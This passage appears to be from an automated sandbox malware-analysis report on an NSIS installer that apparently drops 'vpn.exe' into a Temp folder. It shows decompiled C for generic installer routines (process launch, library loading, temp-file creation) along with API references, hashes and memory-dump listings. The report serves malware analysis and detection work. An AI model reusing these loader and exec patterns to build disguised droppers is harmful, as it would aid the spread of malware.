0x00402455
0x00402485
0x00402487
0x00402457
0x0040245a
0x00402463
0x00402465
0x00402465
0x00402463
0x00402455
0x004024aa
0x004024c3
0x004024c3
0x00000000
0x00000000
0x00000000
0x00402427
0x00402419
0x004030e6
0x004030f2

APIs

GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 0040241C

Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00424E27,7519EA30,00000000), ref: 00404FD6
Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00424E27,7519EA30,00000000), ref: 00404FE6
Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5), ref: 00404FF9
Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory("C:\Users\user\AppData\Local\Temp\nsg8FBB.tmp\"),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

LoadLibraryExW.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 0040242D
FreeLibrary.KERNEL32(?,?), ref: 004024C3

Strings

Error registering DLL: Could not initialize OLE, xrefs: 004024F1
`G, xrefs: 0040246E
Error registering DLL: Could not load %s, xrefs: 004024DB
Error registering DLL: %s not found in %s, xrefs: 0040249A

Memory Dump Source

Source File: 0000000D.00000002.385407365.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.385394869.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.385426913.0000000000409000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.385438977.000000000040C000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385450587.0000000000420000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385493977.000000000046B000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385514327.0000000000560000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
String ID: Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s$`G
API String ID: 1033533793-4193110038
Opcode ID: 1cc22e4cc1f8aee3b4e5ef4230cb15e90ab561ca880ebb648b50f764e72c95de
Instruction ID: ac94b2829880799def153f2ab6d9fb01897d962df66ba524602deb4d09d833fb
Opcode Fuzzy Hash: 1cc22e4cc1f8aee3b4e5ef4230cb15e90ab561ca880ebb648b50f764e72c95de
Instruction Fuzzy Hash: AE21A635A00215FBDF20AFA1CE49A9D7E71AB44318F30817BF512761E1D6BD4A80DA5D

Uniqueness

Uniqueness Score: -1.00%

Function 00402238, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 46%

			E00402238() {
				void* __ebx;
				void* __edi;
				intOrPtr _t16;
				void* _t20;
				void* _t26;
				WCHAR* _t28;
				void* _t30;

				_t28 = E0040145C(_t26, _t20);
				E004062CF(L"Exec: command=\"%s\"", _t28);
				E00404F9E(0xffffffeb, _t28);
				_t16 = E00405C6B(_t28); // executed
				 *((intOrPtr*)(_t30 + 8)) = _t16;
				_push(_t28);
				if(_t16 == _t20) {
					_push(L"Exec: failed createprocess (\"%s\")");
					 *((intOrPtr*)(_t30 - 4)) = 1;
					E004062CF();
				} else {
					_push(L"Exec: success (\"%s\")");
					E004062CF();
					if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
						while(WaitForSingleObject( *(__ebp + 8), 0x64) == 0x102) {
							E0040635E(0xf);
						}
						__ebp - 0x10 = GetExitCodeProcess( *(__ebp + 8), __ebp - 0x10);
						if( *((intOrPtr*)(__ebp - 0x28)) < __ebx) {
							if( *(__ebp - 0x10) != __ebx) {
								 *((intOrPtr*)(__ebp - 4)) = 1;
							}
						} else {
							E00405F7D(__edi,  *(__ebp - 0x10));
						}
					}
					_push( *(__ebp + 8));
					CloseHandle();
				}
				 *0x47eb68 =  *0x47eb68 +  *((intOrPtr*)(_t30 - 4));
				return 0;
			}

0x0040223e
0x00402246
0x00402250
0x00402256
0x0040225b
0x0040225e
0x00402261
0x004022c2
0x00401950
0x00401957
0x00402263
0x00402263
0x00402268
0x00402272
0x00402283
0x0040227e
0x0040227e
0x00402298
0x004022a1
0x004022b1
0x004022b3
0x004022b3
0x004022a3
0x004022a7
0x004022a7
0x004022a1
0x004022ba
0x00402af2
0x00402af2
0x004030e6
0x004030f2

APIs

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory("C:\Users\user\AppData\Local\Temp\nsg8FBB.tmp\"),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00424E27,7519EA30,00000000), ref: 00404FD6
Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00424E27,7519EA30,00000000), ref: 00404FE6
Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5), ref: 00404FF9
Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059

Part of subcall function 00405C6B: CreateProcessW.KERNELBASE ref: 00405C90
Part of subcall function 00405C6B: CloseHandle.KERNEL32(?), ref: 00405C9D

WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
GetExitCodeProcess.KERNEL32 ref: 00402298
CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2

Strings

Exec: success ("%s"), xrefs: 00402263
Exec: command="%s", xrefs: 00402241
Exec: failed createprocess ("%s"), xrefs: 004022C2

Memory Dump Source

Source File: 0000000D.00000002.385407365.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.385394869.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.385426913.0000000000409000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.385438977.000000000040C000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385450587.0000000000420000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385493977.000000000046B000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385514327.0000000000560000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
API String ID: 2014279497-3433828417
Opcode ID: 031a08d2b6da02fb681515a40fddf56cbe11f603cd6b56fae5dc42e48679cfc8
Instruction ID: 042007ee205ef60e30064d08c60082207347e2967af2fac5581f577c4c1081ae
Opcode Fuzzy Hash: 031a08d2b6da02fb681515a40fddf56cbe11f603cd6b56fae5dc42e48679cfc8
Instruction Fuzzy Hash: 4E11A332504115EBDB01BFE1DE49AAE3A62EF04324B24807FF502B51D2C7BD4D51DA9D

Uniqueness

Uniqueness Score: -1.00%

Function 00401EB9, Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 78
COMMON

Download Yara Rule

C-Code - Quality: 52%

			E00401EB9(void* __ebx) {
				void* _t9;
				void _t12;
				void* _t14;
				void* _t22;
				void* _t24;
				void* _t26;
				void* _t27;
				void* _t29;

				_t24 =  *0x40c0e0; // 0x0
				if( *((intOrPtr*)(_t29 - 0x24)) == __ebx) {
					if(_t22 == __ebx) {
						_t9 = GlobalAlloc(0x40, 0x400c); // executed
						_t27 = _t9;
						_t6 = _t27 + 4; // 0x4
						E00406831(__ebx, _t24, _t27, _t6,  *((intOrPtr*)(_t29 - 0x2c)));
						_t12 =  *0x40c0e0; // 0x0
						 *_t27 = _t12;
						 *0x40c0e0 = _t27;
					} else {
						if(_t24 != __ebx) {
							_t4 = _t24 + 4; // 0x4
							E00406035(_t26, _t4);
							 *0x40c0e0 =  *_t24;
							_push(_t24);
							GlobalFree();
						} else {
							_push(L"Pop: stack empty");
							E004062CF();
							 *((intOrPtr*)(_t29 - 4)) = 1;
						}
					}
					goto L17;
				} else {
					while(1) {
						__eax = __eax - 1;
						if(__edi == __ebx) {
							break;
						}
						__edi =  *__edi;
						if(__eax != __ebx) {
							continue;
						} else {
							if(__edi != __ebx) {
								__edi = __edi + 4;
								__esi = L"\"C:\\Users\\alfons\\AppData\\Local\\Temp\\New Feature\\vpn.exe\"";
								__eax = E00406035(__esi, __edi);
								__eax =  *0x40c0e0; // 0x0
								__eax = E00406035(__edi, __eax);
								__eax =  *0x40c0e0; // 0x0
								_push(__esi);
								_push(__eax);
								__eax = E00406035();
								L17:
								 *0x47eb68 =  *0x47eb68 +  *((intOrPtr*)(_t29 - 4));
								_t14 = 0;
							} else {
								break;
							}
						}
						goto L19;
					}
					__eax = E004062CF(L"Exch: stack < %d elements",  *((intOrPtr*)(__ebp - 0x24)));
					_push(0x200010);
					_push(E00406831(__ebx, __edi, __esi, __ebx, 0xffffffe8));
					__eax = E00405CCC();
					_t14 = 0x7fffffff;
				}
				L19:
				return _t14;
			}

0x00401ebc
0x00401ec4
0x00401f26
0x00401f5a
0x00401f63
0x00401f65
0x00401f69
0x00401f6e
0x00401f73
0x00401f75
0x00401f28
0x00401f2a
0x00401f3c
0x00401f41
0x00401f48
0x00401f4d
0x00402387
0x00401f2c
0x00401f2c
0x00401f31
0x00401a13
0x00401a13
0x00401f2a
0x00000000
0x00401ec6
0x00401ec6
0x00401ec6
0x00401ec9
0x00000000
0x00000000
0x00401ecb
0x00401ecf
0x00000000
0x00401ed1
0x00401ed3
0x00401ef7
0x00401efb
0x00401f01
0x00401f06
0x00401f10
0x00401f15
0x00401f1a
0x00401f1e
0x00402e4b
0x004030e3
0x004030e6
0x004030ec
0x00000000
0x00000000
0x00000000
0x00401ed3
0x00000000
0x00401ecf
0x00401edd
0x00401ee4
0x00401ef1
0x00401c3c
0x00401632
0x00401632
0x004030ee
0x004030f2

APIs

Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042

GlobalFree.KERNEL32 ref: 00402387

Strings

"C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe", xrefs: 00401EFB, 00401F00, 00401F1A
Pop: stack empty, xrefs: 00401F2C
Exch: stack < %d elements, xrefs: 00401ED8

Memory Dump Source

Source File: 0000000D.00000002.385407365.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.385394869.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.385426913.0000000000409000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.385438977.000000000040C000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385450587.0000000000420000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385493977.000000000046B000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385514327.0000000000560000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeGloballstrcpyn
String ID: "C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe"$Exch: stack < %d elements$Pop: stack empty
API String ID: 1459762280-4017997668
Opcode ID: 7c0aba1d7e7d8171722a1b2f37f3bcd53767f1c3c610229b623321fa1c0a89a1
Instruction ID: 50a08f61e59307d203ec8fda99e8a78aa4432658e9e299f93ea532572e85a124
Opcode Fuzzy Hash: 7c0aba1d7e7d8171722a1b2f37f3bcd53767f1c3c610229b623321fa1c0a89a1
Instruction Fuzzy Hash: 4921FF72640001EBD710EF98DD81A6E77A8AA04358720413BF503F32E1DB799C11966D

Uniqueness

Uniqueness Score: -1.00%

Function 00406391, Relevance: 6.0, APIs: 4, Instructions: 31
memorylibraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406391(struct HINSTANCE__* _a4, short* _a8) {
				void* _t3;
				void* _t8;
				_Unknown_base(*)()* _t9;

				_t3 = GlobalAlloc(0x40, 0x2004); // executed
				_t9 = 0;
				_t8 = _t3;
				if(WideCharToMultiByte(0, 0, _a8, 0xffffffff, _t8, 0x2004, 0, 0) != 0) {
					_t9 = GetProcAddress(_a4, _t8);
				}
				GlobalFree(_t8);
				return _t9;
			}

0x0040639c
0x004063a2
0x004063a7
0x004063ba
0x004063c7
0x004063c7
0x004063ca
0x004063d5

APIs

GlobalAlloc.KERNELBASE(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 0040639C
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 004063B2
GetProcAddress.KERNEL32(?,00000000), ref: 004063C1
GlobalFree.KERNEL32 ref: 004063CA

Memory Dump Source

Source File: 0000000D.00000002.385407365.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.385394869.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.385426913.0000000000409000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.385438977.000000000040C000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385450587.0000000000420000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385493977.000000000046B000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385514327.0000000000560000.00000002.00020000.sdmp Download File

Similarity

API ID: Global$AddressAllocByteCharFreeMultiProcWide
String ID:
API String ID: 2883127279-0
Opcode ID: cfe0beae58ad61bea83a9ac8add919dc7b7c61ebe1ef4fe2e37f024ea1666988
Instruction ID: 23858f5f5f858bd20c6f81bae205610dc5c3869b82bfcacec746ad73dc06cfd6
Opcode Fuzzy Hash: cfe0beae58ad61bea83a9ac8add919dc7b7c61ebe1ef4fe2e37f024ea1666988
Instruction Fuzzy Hash: 82E092313001117BF2101B269D8CD677EACDBCA7B2B05013AF645E11E1C6308C10C674

Uniqueness

Uniqueness Score: -1.00%

Function 00405EAB, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405EAB(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				intOrPtr _v8;
				short _v12;
				short _t12;
				intOrPtr _t13;
				signed int _t14;
				WCHAR* _t17;
				signed int _t19;
				void* _t23;
				WCHAR* _t26;

				_t26 = _a4;
				_t23 = 0x64;
				while(1) {
					_t12 =  *L"nsa"; // 0x73006e
					_v12 = _t12;
					_t13 =  *0x40a660; // 0x61
					_t23 = _t23 - 1;
					_v8 = _t13;
					_t14 = GetTickCount();
					_t19 = 0x1a;
					_v8 = _v8 + _t14 % _t19;
					_t17 = GetTempFileNameW(_a8,  &_v12, 0, _t26); // executed
					if(_t17 != 0) {
						break;
					}
					if(_t23 != 0) {
						continue;
					} else {
						 *_t26 = _t17;
					}
					L4:
					return _t17;
				}
				_t17 = _t26;
				goto L4;
			}

0x00405eb1
0x00405eb7
0x00405eb8
0x00405eb8
0x00405ebd
0x00405ec0
0x00405ec5
0x00405ec6
0x00405ec9
0x00405ed1
0x00405ee0
0x00405ee4
0x00405eec
0x00000000
0x00000000
0x00405ef0
0x00000000
0x00405ef2
0x00405ef2
0x00405ef2
0x00405ef5
0x00405ef8
0x00405ef8
0x00405efb
0x00000000

APIs

GetTickCount.KERNEL32 ref: 00405EC9
GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,0040382A,004DF0C0,004E30C8), ref: 00405EE4

Strings

nsa, xrefs: 00405EB8

Memory Dump Source

Source File: 0000000D.00000002.385407365.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.385394869.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.385426913.0000000000409000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.385438977.000000000040C000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385450587.0000000000420000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385493977.000000000046B000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385514327.0000000000560000.00000002.00020000.sdmp Download File

Similarity

API ID: CountFileNameTempTick
String ID: nsa
API String ID: 1716503409-2209301699
Opcode ID: 4f25573a167f5d7e94ef3749a48273d52f629be49305b635a70712ae5e4e57be
Instruction ID: e8a8b8b1c64af8904643f6899c21fc71a506a3659d4cdc328e790c9301f5e3ed
Opcode Fuzzy Hash: 4f25573a167f5d7e94ef3749a48273d52f629be49305b635a70712ae5e4e57be
Instruction Fuzzy Hash: D8F09076600208BBDB10CF69DD05A9FBBBDEF95710F00803BE944E7250E6B09E50DB98

Uniqueness

Uniqueness Score: -1.00%

Function 00405C6B, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24
processCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405C6B(WCHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				0x461dd0->cb = 0x44;
				_t7 = CreateProcessW(0, _a4, 0, 0, 0, 0, 0, 0, 0x461dd0,  &_v20); // executed
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}

0x00405c85
0x00405c90
0x00405c98
0x00405c9d
0x00000000
0x00405ca3
0x00405ca7

APIs

CreateProcessW.KERNELBASE ref: 00405C90
CloseHandle.KERNEL32(?), ref: 00405C9D

Strings

Error launching installer, xrefs: 00405C74

Memory Dump Source

Source File: 0000000D.00000002.385407365.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.385394869.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.385426913.0000000000409000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.385438977.000000000040C000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385450587.0000000000420000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385493977.000000000046B000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385514327.0000000000560000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: d7e07479a26add6e139fb42e4e519ed4ce81f94bdda572b5be1add7e8fe8fde5
Instruction ID: 058e85fc593d498414a6a643ff83d14e048665682532f700ab3f6144ed6d8858
Opcode Fuzzy Hash: d7e07479a26add6e139fb42e4e519ed4ce81f94bdda572b5be1add7e8fe8fde5
Instruction Fuzzy Hash: A4E0ECB0900209AFEB009F65DD09E7B7BBCEB00384F084426AD10E2161E778D8148B69

Uniqueness

Uniqueness Score: -1.00%

Function 004067AA, Relevance: 3.1, APIs: 2, Instructions: 53
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004067AA(void* __eflags, intOrPtr _a4) {
				signed char* _t12;
				signed int _t14;
				long _t16;
				signed int _t17;
				signed short* _t24;
				signed int _t26;

				E00406035(0x461e18, _a4);
				_t24 = E00405D85(0x461e18);
				if(_t24 != 0) {
					E00406064(_t24);
					if(( *0x47eb08 & 0x00000080) == 0) {
						L5:
						_t26 = _t24 - 0x461e18 >> 1;
						while(lstrlenW(0x461e18) > _t26) {
							_t12 = E00406301(0x461e18);
							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
								E0040677D(0x461e18);
								continue;
							} else {
								_t14 = 0;
								L11:
								return _t14;
							}
						}
						E0040674E(0x461e18);
						_t16 = GetFileAttributesW(0x461e18); // executed
						_t14 = 0 | _t16 != 0xffffffff;
						goto L11;
					}
					_t17 =  *_t24 & 0x0000ffff;
					if(_t17 == 0 || _t17 == 0x5c) {
						goto L1;
					} else {
						goto L5;
					}
				}
				L1:
				return 0;
			}

0x004067b6
0x004067c1
0x004067c5
0x004067cc
0x004067d8
0x004067e7
0x004067f0
0x00406809
0x004067f5
0x004067fc
0x00406804
0x00000000
0x0040682d
0x0040682d
0x00406827
0x00000000
0x00406827
0x004067fc
0x00406811
0x00406817
0x00406825
0x00000000
0x00406825
0x004067da
0x004067e0
0x00000000
0x00000000
0x00000000
0x00000000
0x004067e0
0x004067c7
0x00000000

APIs

Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042

Part of subcall function 00405D85: CharNextW.USER32(-00000002,?,00461E18,004E30C8,004067C1,00461E18,00461E18,00406CDA,?,-00000002,00406CDA,?,004CF0A0), ref: 00405D93
Part of subcall function 00405D85: CharNextW.USER32(00000000), ref: 00405D98
Part of subcall function 00405D85: CharNextW.USER32(00000000), ref: 00405DB0

lstrlenW.KERNEL32(00461E18,004E30C8,00000000,00461E18,00461E18,00406CDA,?,-00000002,00406CDA,?,004CF0A0), ref: 0040680A
GetFileAttributesW.KERNELBASE(00461E18,00461E18), ref: 00406817

Memory Dump Source

Source File: 0000000D.00000002.385407365.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.385394869.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.385426913.0000000000409000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.385438977.000000000040C000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385450587.0000000000420000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385493977.000000000046B000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385514327.0000000000560000.00000002.00020000.sdmp Download File

Similarity

API ID: CharNext$AttributesFilelstrcpynlstrlen
String ID:
API String ID: 3248276644-0
Opcode ID: 09bd9f4f4bc4ae5b1ae8a956b705f631aaf87a84e9a2d6cedc9e286269f99e42
Instruction ID: c271629f7750957e5fd102afcb20a97c51063d27386b99ed5bca430d7485d950
Opcode Fuzzy Hash: 09bd9f4f4bc4ae5b1ae8a956b705f631aaf87a84e9a2d6cedc9e286269f99e42
Instruction Fuzzy Hash: 9201F72210592215D61277360C49D6F19848E46778317453FF813B32D2DF3CC972D0BE

Uniqueness

Uniqueness Score: -1.00%

Function 0040139D, Relevance: 3.0, APIs: 2, Instructions: 42
windowCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E0040139D(signed int _a4) {
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				signed int _t15;
				signed int _t16;
				void* _t17;

				_t16 = _a4;
				while(_t16 >= 0) {
					_t6 = _t16 * 0x1c +  *0x47ead0;
					if( *((intOrPtr*)(_t16 * 0x1c +  *0x47ead0)) == 1) {
						break;
					}
					_t8 = E004015A0(_t6); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040137E(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t15 = _t16;
						_t16 = _t11;
						_t12 = _t11 - _t15;
					} else {
						_t12 = _t10 + 1;
						_t16 = _t16 + 1;
					}
					if( *((intOrPtr*)(_t17 + 0xc)) != 0) {
						 *0x476a8c =  *0x476a8c + _t12;
						SendMessageW( *(_t17 + 0x18), 0x402, MulDiv( *0x476a8c, 0x7530,  *0x476a84), 0);
					}
				}
				return 0;
			}

0x0040139e
0x0040140c
0x004013a9
0x004013b2
0x00000000
0x00000000
0x004013b5
0x004013bf
0x00000000
0x00401416
0x004013c2
0x004013c9
0x004013cf
0x004013d0
0x004013d2
0x004013d4
0x004013cb
0x004013cb
0x004013cc
0x004013cc
0x004013db
0x004013dd
0x00401406
0x00401406
0x004013db
0x00000000

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406

Memory Dump Source

Source File: 0000000D.00000002.385407365.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.385394869.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.385426913.0000000000409000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.385438977.000000000040C000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385450587.0000000000420000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385493977.000000000046B000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385514327.0000000000560000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 0bd6c5a8fdcdf2cf9a6bba33cc7502a6d80b6dcfa2a0e894e00c73e73fb262d4
Instruction ID: 11189a7010c7ef4f551f6273c6f502c25af520ce36bbf29b1e3929f99495605f
Opcode Fuzzy Hash: 0bd6c5a8fdcdf2cf9a6bba33cc7502a6d80b6dcfa2a0e894e00c73e73fb262d4
Instruction Fuzzy Hash: 64F02831A10220DBD7165B349C08B273799BB81354F258637F819F62F2D2B8CC41CB4C

Uniqueness

Uniqueness Score: -1.00%

Function 00403CAF, Relevance: 3.0, APIs: 2, Instructions: 19
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403CAF() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t8;

				_t8 =  *0x441d48;
				_t3 = E00403C94(_t2, 0);
				if(_t8 != 0) {
					do {
						_t6 = _t8;
						_t8 =  *_t8; // executed
						FreeLibrary( *(_t6 + 8)); // executed
						_t3 = GlobalFree(_t6);
					} while (_t8 != 0);
				}
				 *0x441d48 =  *0x441d48 & 0x00000000;
				return _t3;
			}

0x00403cb0
0x00403cb8
0x00403cbf
0x00403cc2
0x00403cc2
0x00403cc7
0x00403cc9
0x00403cd0
0x00403cd6
0x00403cda
0x00403cdb
0x00403ce3

APIs

FreeLibrary.KERNELBASE(?,004CF0A0,00000000,-00000002,004038A2,00403AFD,?), ref: 00403CC9
GlobalFree.KERNEL32 ref: 00403CD0

Memory Dump Source

Source File: 0000000D.00000002.385407365.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.385394869.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.385426913.0000000000409000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.385438977.000000000040C000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385450587.0000000000420000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385493977.000000000046B000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385514327.0000000000560000.00000002.00020000.sdmp Download File

Similarity

API ID: Free$GlobalLibrary
String ID:
API String ID: 1100898210-0
Opcode ID: 7aa37d378bfefabf0302afd0e1a532a972c8a2f9516866eadea19155c7ce1dfe
Instruction ID: d508d635739c5d3a1219feb871e2955d0a85dc440870d7c5be7dc09a9f5a7bc1
Opcode Fuzzy Hash: 7aa37d378bfefabf0302afd0e1a532a972c8a2f9516866eadea19155c7ce1dfe
Instruction Fuzzy Hash: 95E0C233A1412097EB215F45E90C75ABB78AF89B72F024036E880BB26187342C8186C8

Uniqueness

Uniqueness Score: -1.00%

Function 00405E7C, Relevance: 3.0, APIs: 2, Instructions: 15
fileCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E00405E7C(WCHAR* _a4, long _a8, long _a12) {
				signed int _t6;
				void* _t7;

				_t6 = GetFileAttributesW(_a4);
				_t2 = _t6 + 1; // 0x1
				asm("sbb ecx, ecx");
				_t7 = CreateFileW(_a4, _a8, 1, 0, _a12,  ~_t2 & _t6, 0); // executed
				return _t7;
			}

0x00405e80
0x00405e86
0x00405e8d
0x00405ea2
0x00405ea8

APIs

GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2

Memory Dump Source

Source File: 0000000D.00000002.385407365.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.385394869.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.385426913.0000000000409000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.385438977.000000000040C000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385450587.0000000000420000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385493977.000000000046B000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385514327.0000000000560000.00000002.00020000.sdmp Download File

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: ea37a1a334eaa57c44c9ac3bd50a12c4681d8f83bf4f6bb47fe7ae46db9ee3b5
Instruction ID: 4537c79132fc6b4e07af9f6f4ddc5e1db4475248beafdc935845b7fb5ee8fdc2
Opcode Fuzzy Hash: ea37a1a334eaa57c44c9ac3bd50a12c4681d8f83bf4f6bb47fe7ae46db9ee3b5
Instruction Fuzzy Hash: 08D09E71558202EFEF098F60DD1AF6EBBA2EB94B00F11852CB252550F1D6B25819DB15

Uniqueness

Uniqueness Score: -1.00%

Function 00405E5C, Relevance: 3.0, APIs: 2, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405E5C(WCHAR* _a4) {
				signed int _t3;
				int _t5;

				_t3 = GetFileAttributesW(_a4); // executed
				if(_t3 != 0xffffffff) {
